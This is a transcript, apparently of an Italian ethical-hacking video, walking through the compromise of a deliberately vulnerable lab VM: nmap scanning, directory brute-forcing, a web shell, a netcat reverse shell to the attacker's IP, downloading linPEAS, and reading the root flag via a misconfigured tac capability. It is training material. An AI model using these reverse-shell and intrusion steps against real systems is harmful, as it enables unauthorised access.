In questo video scaricheremo e installeremo la macchina virtuale vulnerabile backdoored da Volnab. Volnab è un sito web da dove possiamo scaricare sistemi Linux vulnerabili per comprometterli con le tecniche di hacking molto diverse tra loro, con l'intenzione di ottenere l'accesso aggirando la necessità di dover indovinare la password del sistema e ottenere i massimi privilegi, ottenendo quindi il controllo completo sulla macchina remota, che in questo caso sarà locale. Queste sono le stesse identiche tecniche che gli hacker utilizzano per entrare illecitamente nei sistemi, per rubare password, rubare informazioni, come anche soldi, fare spionaggio industriale o militare. Queste tecniche, per chi fosse nuovo alla materia, vengono usate dagli hacker etici o white hat nel mondo della sicurezza informatica per testare quale sia la postura di sicurezza dei sistemi informatici dei clienti, in maniera tale da generare poi dei rapporti di penetration test e comunicare ai clienti tecniche di mitigazione e ovviare alle vulnerabilità presenti potenzialmente nelle loro infrastrutture. Sigla! Ok, per installare Kali e le macchine virtuali in genere ho fatto un video per risolvere il problema di network di questa macchina virtuale. Se la stai usando in VirtualBox o UTM sul Mac invece che VMware, ne ho fatto un altro. Troviamo l'IP della macchina nel network locale con Kali. Allora, backdoor, l'avvio adesso. Dal video precedente che ho fatto dovrebbe essere 172.20.10.2. Kali, Kali, sudo net discover, Kali. Credo che però proverà nella subnet sbagliata. Ctrl C, vediamo con if config sia la stessa. No, sta provando a connettersi ancora in realtà. Diamogli tempo. Settings, network. Eh no, stai su quella sbagliata perché l'ho collegata tramite l'Apple. Ok, e invece per quanto riguarda backdoor, andiamo in settings. Ok, devono essere la stessa, che devono stare nella stessa subnet. Ok, if config, e adesso è 127.20.10.3, quindi sudo netdiscover nella subnet 172.20.10.0.24. Eccola là. In VirtualBox le macchine di Bullnab vengono identificate come PCS System Technic GmbH, infatti sarà esattamente quella. Proviamo a fare un ping. Ok, la raggiungiamo senza problemi. Che servizi sono disponibili sulla macchina? Usiamo Nmap per vedere quali siano quelli esposti e raggiungibili. Abbiamo bisogno di un punto di entrata iniziale, in sostanza. Cos'è Nmap e come si usa? Ho fatto un altro video, sempre sul canale. Vedi, questo è il motivo per cui sto curando tutte le basi, in maniera tale che se ti manca qualche conoscenza, la troverai sul canale. Sudo nmap -t5-a-ss-p-172.20.10.2. T è timing template, il più alto e il più veloce perché siamo in locale e non c'è il rischio che buttiamo giù la macchina. Meno A è script di default, traceroute e rilevamento del sistema operativo. Sono tre opzioni in una. Meno SS è più veloce perché non completa la three-way handshake TCP. E meno P- sono tutte 65.535 porte. Invio. Puoi premere invio in qualsiasi momento per vedere a che punto stia la scansione. Dice che ha già fatto l'87%. Meno T5 è molto molto veloce. Poi in locale la velocità è beh, più veloce di così è impossibile. Eccolo qua.
abbiamo trovato giusto un server sulla porta 1337. Quindi apriamo Firefox. Ecco qua. Dice backdoor. Difficoltà facile. Chi l'ha fatta? Le flag dice dove sono nelle cartelle. Tra l'altro facendo un errore. Discord. Blah blah blah. Non puoi ottenere una shell di root, ma leggere la flag di root sarà abbastanza. Dici che è impossibile ottenerla. Ci sono altri modi. Beh, l'abbiamo già visto nel video precedente per ottenere la shell di root. Perché abbiamo accesso alla macchina virtuale, ma l'ha creata in una maniera tale che non sia possibile creare una shell come root. Credo che in ogni caso sia possibile creando un'altra utenza o facendo dei magheggi. Però ci limiteremo semplicemente a leggere, a ottenere una shell come un utente normale e poi a leggere la flag di root. Facciamo il dirbusting del server web, sempre dalla OWASP, il link a fine video. Il dirbusting consiste nel trovare le cartelle e i file sul server. Quando visitiamo una pagina web, possiamo cliccare su tutti i link che sono presenti nelle pagine. Che sono qui. Se una pagina o un file però non è indicizzato nelle pagine del sito web, non sarà ovvio che file o cartelle sono posizionate sul server a cui potremo avere accesso. Prenderemo infatti con un tool di dirbusting una lista di parole o word list con nomi dei file più comuni per testarne centinaia o migliaia al minuto in una maniera completamente automatizzata. Per fare questa operazione esistono tool con interfacce grafiche come Dirbuster, come anche da terminale ne esistono diversi. Dirbuster forse è uno dei più user-friendly. Useremo quello. Dirbuster lo troviamo su Kali come Dirbuster. Dirb da terminale. Ok. HTTP. 172.20.10.2 sulla porta 1337. Come word list gli diamo. Sanno di solito in user share word lists. Gli diamo della dirbuster, la directory lowercase 2.3 medium. È quello che si usa anche solitamente su Hugbox, dove chi crea le macchine infila la maggior parte di questi nominativi in maniera tale che non passi una vita a trovare file e cartelle interessanti. Selezioniamo la lista. Non essere ricorsivo perché altrimenti impiegherai una vita. Non fare il brute force dei file con l'estensione PHP. Ma anche se sì, dai. Magari trovo qualcosa con TXT. Così proverà tutte le parole della lista più tutte le parole della lista con l'estensione TXT applicata. Però ti faccio vedere i user share word list dirbuster. Diciamo vim directory list 2.3 medium. No, diciamo directory list lowercase perché ne sono di meno e dubito che sia case sensitive. Medium, tra l'altro non so nemmeno quale delle due ci ho messo qua. Sì, è lowercase, fatto bene. Let nu. E vediamo che abbiamo 207.000 parole. Control B. GG. Control F. Vediamo, ci sono tutte parole comuni che vengono trovate solitamente nei web server, Linux forums, jobs, business, video, email, encryption, schools, exec, question. Insomma, provarne 207.000 a mano credo che sarebbe leggermente, richiederebbe un po' di tempo. Però dal momento che questa la userò molto spesso, questa la prendo, la copio, directory list 2.3. No, list lowercase 2.3 medium e la sposto in home Cali.
Basta. In maniera tale che l'ho qui nella home di Kali. Sarà più facile quando lo utilizzeremo da terminale, perché ogni volta ridigitare tutto il percorso è un casino. Si può fare anche un link, però preferisco copiarla e incollarla, poca roba di spazio. Ok, avviamolo. Ok, ha terminato la scansione, ha impiegato più o meno 20-25 minuti, adesso non ricordo bene. E ha trovato la directory, vabbè, la root, icons, a cui però non si può accedere perché ci ridà un restituisce un 403, un robots.txt e server status, stessa cosa, 403. 200 significa ok, ciò significa che possiamo visitarla, quindi di tutte quelle wordlist che ha provato, con e senza l'estensione .txt ha trovato soltanto robots.txt, che adesso visitiamo. Ok, qui trova un file, si chiama base64 string che contiene lo user SSH e la password. Ciò significa che potremmo decrittarla, non c'è niente da decrittare, decodificarla, base64, e accedere alla macchina. Ma vediamo che è not found, e probabilmente ho una cosa che la persona che ha fatto la macchina avrebbe voluto mettere, ma e poi ci ha ripensato, oppure è una rabbit hole, una tana del bianconiglio, si chiamano così in inglese, rabbit hole, cioè un qualcosa che viene messo lì per sviarti, per fartela credere e per trollarti, in sostanza. Succede molto spesso sulle macchine di Hack the Box, anche se su Hack the Box scrivono nelle regole per fare le macchine di evitare troppe rabbit holes, perché altrimenti poi da un puro punto di vista di game design diventa solo fastidioso e ci rinuncio, perché dice ma cioè, sto qua per imparare e mi stai facendo perdere tempo, no? Ok, quindi adesso proviamo invece con WFuzz a fare la stessa operazione per farti vedere quanto tempo ci impieghi. E tra l'altro lancialo sul Dirbuster e poi lancia anche questo comando su WFuzz in maniera tale che vedrai qual è la differenza tra le due. Si chiama WFuzz, ora ti faccio vedere WFuzz. Un web application brute force. Allora, WFuzz. U per URL. 2, 20, 10, 2. Poi dovremo dargli il fuzz, cioè il punto dove provare le wordlist. La wordlist, e qua gli diamo home, Kali. Ok, era un po' lento. Il motivo per cui l'ho messa nella home, in maniera tale che sia meno una rottura. Meno meno HC significa hide content, cioè voglio che quando escono un redirect, l'altro redirect, il denied, forbidden che abbiamo visto prima e il not found non vengono dati i risultati. E poi il threading, che è come il timing template per Nmap, in maniera tale che vada un po' più veloce. Prima invio. Ok, quelle prime 200 sono farlock, infatti sarebbe meglio eliminare quelle prime righe da di altre wordlist, perché nell'HTML l'asterisco viene interpretato come capitolo, mi sembra che fosse, serve in una pagina HTML ad andare in una all'altezza di un header specifico. Se hai studiato l'HTML saprai a cosa mi riferisco, stanno anche su Wikipedia questi. Sai, quando vai sulle tabelle dei contenuti e clicchi sulla tabella dei contenuti, cioè su uno degli elementi della tabella dei contenuti, e poi ti porta a uno degli heading che corrisponde alla tabella dei contenuti, solitamente nell'HTML viene rappresentato con quel simbolo, con l'hash. È il motivo per cui lo restituisce con un 200. Infatti, se proviamo... No, è perfettamente visitabile. Quindi è ovvio che ci restituisca un 200 che l'ha trovata, perché restituisce la pagina. Ok, questa volta non ho trovato assolutamente niente, però una cosa su cui voglio concentrarmi è che ho avviato questo scan alle 15:10 e adesso sono le 15:12, quindi ha impiegato 2 minuti.
Non abbiamo testato le TXT, ma sarebbe stato semplicemente il doppio delle richieste e invece che 2 minuti ne avrebbe impiegati 4. Quindi, WUFAZ vince rispetto a Dear Buster. Perché Dear Buster è così lento? Beh, Adrià, avresti potuto aumentare il numero dei threads in Dear Buster. Sì, ma si sarebbe incagliato, come è successo miliardi di volte prima, infatti non lo uso più. Se vuoi lanciare una cosa al volo senza ricordarti le opzioni, Dear Buster, sì, va bene. Però ricordiamoci anche che è stato scritto in Java. E la gestione della memoria in Java fa veramente pena. Rispetto soprattutto se lo consideriamo a questi tool, no? Che magari vengono compilati, che ne so, con C, C++, la performance sta proprio a un altro livello. C'è un motivo per cui Cyberpunk 2077 l'hanno fatto con l'Unreal Engine e non con Java, come... Ad esempio è successo per Minecraft. Allora, ma come prima dicevo, non ha trovato niente. Proviamo con un'altra lista. Adesso esiste questa lista, si chiama Sacklist di Daniel Meisler, non mi ricordo come si chiama. Prima la scaricavamo qualche anno fa direttamente da GitHub, ma è talmente utile che hanno deciso di aggiungerle alla repo. Creare proprio una repo per le sacklist. Infatti basta che fai, se non è già installata, sudo apt install sacklists -y. E installerà sti 470 mega di wordlist per tutto. DNS, web, chi più ne ha più ne mette. Vabbè, mo aspettiamo che finisce di scaricare. Fade out. Ok, ha finito. Però ho dovuto staccare il cellulare perché usava la sua connessione, quindi ho fatto poi di magheggi, vediamo se ho lo stesso IP. Se ho l'IP. No. Siamo nella rete sbagliata. Buttiamola giù. Riportiamola su. Ok. Vediamo se riusciamo ancora a raggiungere la backdoor. Pare di sì. Sì. Che cosa ho fatto? Ho visto prima con ping se riusciamo a raggiungerla a livello di network. E poi ho fatto curl per ottenere i contenuti della pagina homepage HTML. Sì, adesso la raggiungiamo. Questo per evitare di stare a aprire Firefox. Più veloce. Vedi come quando fai tutte le cose da terminale quanto sono più veloci? Non è soltanto un fatto da hacker dei film di Hollywood, è un fatto che semplicemente le cose sono più veloci e se impari lo scripting in bash, tutte queste cose le puoi automatizzare e i risultati di ogni tool puoi attraverso grep e un'altra serie di altri tool di Linux che esistono da una vita dire guarda se trovi questa cosa nel contenuto agisci in quest'altro modo. E puoi automatizzare tutto il tuo flusso di lavoro. Quindi ti rendi conto di qual è sia la potenza di utilizzare principalmente il terminale. Poi questo è tutto un discorso su Linux che farò più avanti. Allora, dicevamo, WUFAZ -U. Ok, più o meno è quello il comando. Però, thread, gliene do 500 stavolta. Ricorda lo slash dopo WUFAZ, altrimenti potrebbe non trovare le cartelle. E adesso dobbiamo andarci a ritrovare dove le sacklist siano state installate. Allora, Ctrl Shift T, quindi stava in user share sacklist discovery web content ci interessa. Discovery web content, ce ne sono diverse, stanno un bel po'. Raft large deer, vogliamo adesso. Raft large deer, vediamo quali ha. Ne stanno due, lowercase. Se ci interessa questa qua. Allora. Here, lower.
It's clip selection clip. Go up install X clip. Sto installando Xclip. Questo ci permette di prendere i contenuti, cioè quello che viene restituito dai comandi del terminale nella clipboard del sistema. Cioè significa che facciamo col tasto destro del mouse, possiamo incollare i risultati. Giusto per farti vedere un'altra cosa che si può fare per velocizzare le cose. Avrei potuto benissimo selezionarla e premere col destro del mouse, ma noi non siamo dei principianti. Ok, CTRL SHIFT e V. Vedi? La copiamo. E l'abbiamo. Sono le 15:30. Un minuto dopo ha trovato Web Admin. In realtà un minuto dopo ha anche finito di testare tutte e 56.000 le parole chiave. Quindi stavolta andiamo su Firefox 172. Andiamo su Web Admin e qui c'è una web shell, è troppo piccolo. E però se lo allarghi si rompe. Vabbè, lo lasciamo così. Come mai? Boh. Capisci adesso perché dico sempre che reconnaissance è la fase più importante del penetration test? Se non avessimo insistito con questi tool di deer busting, non avremmo trovato questa pagina e non saremmo riusciti a entrare nel sistema come faremo a breve. Foothold, ovvero ottenere il primo accesso alla macchina. Abbiamo una shell di netcat inversa sul nostro sistema. C meno LBP 4444, come ho già fatto vedere nel video di Nmap. NC NC LP di Gale, non me lo ricordo. Centosettantadue 20 10 3 4444, che è la stessa porta, meno E, bin, bash. Siamo dentro. Non sarà però interattiva. Usiamo Python 3 sul sistema in modo che potremo fare l'accesso agli altri servizi da terminale se necessario. Ad esempio, se c'è MySQL vogliamo accedere con una password che troviamo nei file di configurazione nel sistema, perché adesso la superficie di attacco si è estesa. Ne parlerò molto a brevi. Python 3-c import pty.spawn bin bash. E adesso abbiamo una shell interattiva. Possiamo navigare un po' il sistema, vediamo qual è la directory attuale, web admin, facciamo ls, index, andiamo indietro. Questa forse è sempre una delle parti più divertenti, una volta che entri e vedere che cosa c'è dentro la macchina. È andato in crash il computer, di nuovo, io ho la pazienza di un santo. Allora, dicevamo, questi sono i contenuti della web root, ma andiamo nella root del sistema e vediamo che abbiamo il classico file system, un'organizzazione di Linux. Andiamo, se proviamo ad accedere al root, non abbiamo i permessi.
Però possiamo andare nella home di Bob. Adesso c'è qualcosa di nascosto. No. Bob. Windows. Wow, Windows. Mi è crashato il sistema due volte di fila. Il problema è la scheda audio. Nello specifico i driver della scheda audio. Probabilmente il buffer size che non ce la fa. Quindi sono due le cose. O se usi OBS vuoi registrare roba di sicurezza informatica. O abbassi tutte le caratteristiche tipo CPU e RAM di tutte le macchine virtuali che usi. O te fai una CPU che è molto più performante. O ti prendi anche una scheda audio che ha degli... dei driver che sono fatti meglio, come ad esempio la Army UCX2, ma costa un occhio della testa. Stesso problema con l'Apollo Twin, altri problemi su problemi. Ma stavamo qua. Ok, la user flag. Si chiamano flag perché esistono competizioni tra hacker dove si gioca a cattura la bandiera, dove il primo gruppo di hacker che prende questa flag si aggiudica punti. Succede su TryHackMe. Vengono anche usate in tutti i laboratori di pentesting, appunto come tra Acme e Hack the Box, tra i più famosi. Come anche sulle macchine dei laboratori, della OSCP. Altra cosa interessante qui è che a volte può essere una buona idea leggere che cosa c'è nella bash history. Nulla. Perché potrebbero starci cose interessanti. Comandi che sono stati digitati, magari con la password in chiaro di accesso ad alcuni servizi all'interno della macchina. Se vuoi andare più a fondo con il penetration testing manuale, c'è il mio InfoSec bundle su Teachable, scontato, dove troverai tutto quello che ti serve per diventare una cyber bestia da assalto tattico. Il link è in descrizione. Novità, QR code. Un corso di base su Python per programmare è anche attualmente scontato fino a fine agosto 2024. Entro fine mese sarà disponibile un nuovo mega corso di Linux scontato per principianti, scontato per i primi 200 iscritti. Ma passiamo al privilege escalation della macchina per passare da Bob a Root. Lo scalamento dei privilegi consiste nell'ottenere appunto privilegi più alti sulla macchina. In questo video ci limiteremo a mostrare i contenuti della flag di Root e concluderemo il video. Ricordi quando abbiamo fatto la prima scansione con Nmap? Allora la superficie di attacco era composta dal server, che poi abbiamo visitato. Adesso che siamo Bob, abbiamo accesso al sistema nel contesto dei suoi privilegi, cioè cosa può fare sulla macchina. Ci sono molti comandi di Linux che possiamo usare, come find ad esempio, e fare delle ricerche manualmente per vedere se ci siano vulnerabilità del kernel, altre password di altri utenti, come anche la password di accesso ad esempio a un database o file eseguibili con permessi errati. LinPeace è uno script che automatizza questi controlli. C'è anche una versione per Windows che si chiama WinPeace. LinPeace. Eccolo qua, da GitHub, dice curl. Scriviamo sulla nostra macchina, sul desktop. Ctrl-Shift-V. Ma curl non ci piace, usiamo Vget. In questo modo viene eseguito direttamente una volta che viene scaricato, ma con tutti i problemi che ci sono solitamente quando li installiamo sulla macchina, perché le configurazioni possono essere vecchie, comunque potrebbe non funzionare. Non potrebbe neanche riuscire a non scaricarlo da internet, potrebbe dare dei problemi con SSL. Meglio che te lo scarichi sulla macchina tua e poi lo sposti. Ecco qua, LinPeace. Il dir basta, il report non ci serve. Ok, LinPeace. Serviamolo tramite Python sulla macchina vulnerabile. Python 3. Server. Adesso capisci perché Python è il linguaggio preferito dagli hacker. Facciamo accesso alla cartella TMP dove solitamente abbiamo la possibilità di scaricare e eseguire file nel contesto del privilegio dell'utente attualmente connesso. E facciamo wget 72.20.10.3, che dovrebbe essere l'IP di Cali, sì, sulla porta 3000. Chiama linpeace.sh. Ok, scaricato. Prendiamolo eseguibile. Linpeace.sh.
E adesso lo eseguiamo. Linpeace.sh di linout.txt. Mi scuso per il cambio di schermate, ma oggi continua ad andarmi in crash il computer. Allora, dicevo che T serve a mostrare su schermo i risultati del programma mentre vengono salvati su file, in questo caso in linout.txt. Ok, dicevamo, linpeace T viene utilizzato sia per mostrare sul terminale i risultati di linpeace che per salvarli sul file, in questo caso in linout.txt, è un nome che gli do io, di solito, linpeaceout. Vediamo che qui fa tutte le sue verifiche. Queste in sostanza sono tutti comandi che potremmo digitare manualmente su Linux e andrebbero conosciuti in ogni caso, perché se linpeace, se non riuscissimo ad eseguirlo ad esempio sulla macchina, dovremmo conoscere tutti i comandi per fare queste operazioni di privilege escalation in maniera manuale. E ho già letto tutto, ma per farla veloce, il vettore di attacco per il privilege escalation è TAC, file con capacità. Allora, user bin TAC, così otteniamo l'help del programma. E così riusciamo con TAC ad ottenere la root, perché se avessimo provato a leggerla direttamente nel contesto di Bob non ci saremmo riusciti. Permission denied. Ma dal momento che il file, che il binario TAC è impostato in malo modo, sarà possibile utilizzarlo per leggere tutti i file che sono di proprietà di root e che altrimenti non potremmo leggere nel contesto dei privilegi di Bob. Ma come avrei fatto a capire che dovevo usare TAC in quel modo? Tutto quello che verrà fuori dai risultati di linpeace dovrà essere analizzato in una maniera molto scrupolosa. Con i giorni, i mesi e gli anni vedrai che i vettori di attacco sono sempre gli stessi. Saranno un migliaio, 1000, 2000, 3000. Diventerà comunque di seconda natura andando avanti con il tempo. Questo con il tempo diventerà il tuo database mentale che ti permetterà con il tempo di riuscire a compromettere le macchine nel giro di qualche minuto piuttosto che nel giro di qualche giorno o di qualche settimana, perché ci vuole tempo. Però maggiore è il tuo database mentale di tutti i possibili vettori di attacco e più sarai vicino a essere un hacker, come li fanno vedere nei film di Hollywood, in cui mettono le mani su una tastiera, muovono le dita molto velocemente e dicono: sono dentro. Però nel mondo reale possono valerci, ripeto, giorni o settimane, o nel caso dei bug bounties mesi o di più. E così abbiamo hackerato la prima macchina vulnerabile di Vulnab. Prova a scaricarne anche altre con difficoltà easy, facile, su Vulnab, sempre. Troverai anche i write-up, che in pratica sono le soluzioni, o walkthrough, se vogliamo, come quelli dei videogiochi. Non c'è niente di male a leggere direttamente le soluzioni, ma provare a bucarle, come si dice nel gergo, da zero, senza aiuti, può essere più soddisfacente. Anche se prima sarebbe meglio avere una panoramica d'insieme leggendo la OWASP Testing Guide per il lato Web Penetration Testing e la Penetration Testing Execution Standard per quanto riguarda un lato più generico, come anche quello di Network, The Penetration Testing. E questo è tutto per il video su Backdoor. Ci vediamo presto con nuovi video di Ethical Hacking. Grazie e arrivederci!